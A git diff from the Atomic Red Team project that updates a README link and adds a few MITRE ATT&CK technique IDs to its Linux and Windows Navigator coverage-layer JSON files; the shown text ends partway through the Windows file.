@@ -39,7 +39,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr ## Getting Started * [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team) -* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks) +* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework) * Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md) - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv)) - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv)) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 0e6e94e2..67f28848 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"
techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techni
queID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID
":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":
"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index b9533028..03b04c3f 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true
},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001",
"score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":10
0,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001",
"score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"
enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID
":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"en
abled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{
"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100
